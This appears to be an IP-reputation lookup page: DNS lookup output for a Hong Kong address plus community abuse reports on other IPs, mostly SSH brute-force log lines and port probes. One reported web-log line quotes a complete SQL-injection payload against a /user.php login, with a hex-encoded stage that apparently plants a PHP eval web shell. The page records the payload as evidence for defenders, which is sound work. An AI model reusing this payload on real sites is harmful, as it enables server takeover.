Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: Hong Kong

Internet Service Provider: 3

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 103.120.83.54
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 32749
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;103.120.83.54.			IN	A

;; AUTHORITY SECTION:
.			299	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022030501 1800 900 604800 86400

;; Query time: 67 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Mar 06 06:15:00 CST 2022
;; MSG SIZE  rcvd: 106
Host info
Host 54.83.120.103.in-addr.arpa not found: 2(SERVFAIL)
Nslookup info:
;; Got SERVFAIL reply from 183.60.83.19, trying next server
Server:		183.60.82.98
Address:	183.60.82.98#53

** server can't find 54.83.120.103.in-addr.arpa: SERVFAIL

Related IP info:
Related comments:
IP Type Details Datetime
159.203.17.176 attackbotsspam
frenzy
2019-06-30 15:27:55
116.106.223.124 attackspam
5555/tcp
[2019-06-30]1pkt
2019-06-30 15:48:58
125.71.132.78 attackspam
Jun 30 05:41:14 rpi sshd\[15882\]: Invalid user feroci from 125.71.132.78 port 51938
Jun 30 05:41:14 rpi sshd\[15882\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=125.71.132.78
Jun 30 05:41:16 rpi sshd\[15882\]: Failed password for invalid user feroci from 125.71.132.78 port 51938 ssh2
2019-06-30 15:45:19
122.175.55.196 attackspambots
Invalid user repos from 122.175.55.196 port 38408
2019-06-30 15:22:25
189.90.210.183 attackbots
libpam_shield report: forced login attempt
2019-06-30 15:50:16
185.153.180.63 attackbotsspam
185.153.180.63 - - [30/Jun/2019:02:45:52 -0400] "GET /user.php?act=login HTTP/1.1" 301 250 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:288:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/*";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
...
2019-06-30 15:13:01
139.59.38.22 attackbotsspam
Bruteforce on SSH Honeypot
2019-06-30 15:25:09
182.72.104.106 attackspam
Jun 30 08:42:28 MK-Soft-Root2 sshd\[2789\]: Invalid user openproject from 182.72.104.106 port 43966
Jun 30 08:42:28 MK-Soft-Root2 sshd\[2789\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=182.72.104.106
Jun 30 08:42:30 MK-Soft-Root2 sshd\[2789\]: Failed password for invalid user openproject from 182.72.104.106 port 43966 ssh2
...
2019-06-30 15:56:19
73.252.161.153 attackspam
[ssh] SSH attack
2019-06-30 15:47:51
94.21.75.55 attackbotsspam
Jun 27 02:16:37 mail sshd[1883]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=94-21-75-55.pool.digikabel.hu
Jun 27 02:16:39 mail sshd[1883]: Failed password for invalid user cisco from 94.21.75.55 port 42397 ssh2
Jun 27 02:16:39 mail sshd[1883]: Received disconnect from 94.21.75.55: 11: Bye Bye [preauth]
Jun 27 02:19:54 mail sshd[2337]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=94-21-75-55.pool.digikabel.hu


........
-----------------------------------------------
https://www.blocklist.de/en/view.html?ip=94.21.75.55
2019-06-30 15:49:17
49.206.224.31 attackbotsspam
IP attempted unauthorised action
2019-06-30 15:28:29
222.139.254.236 attackspam
23/tcp
[2019-06-30]1pkt
2019-06-30 15:30:56
36.90.169.198 attack
445/tcp
[2019-06-30]1pkt
2019-06-30 15:56:53
118.161.12.76 attackbots
37215/tcp
[2019-06-30]1pkt
2019-06-30 15:17:12
187.107.17.9 attackbotsspam
5358/tcp
[2019-06-30]1pkt
2019-06-30 15:44:57

Recently Reported IPs

103.120.83.125 103.121.122.180 103.121.149.18 103.121.149.19
103.121.200.11 103.121.89.234 103.121.90.246 202.216.214.188
103.122.33.210 103.122.5.109 103.122.65.34 103.122.67.199
103.122.94.96 103.123.112.59 103.123.151.182 103.123.16.126
103.123.16.155 103.123.33.17 103.123.73.125 103.123.74.114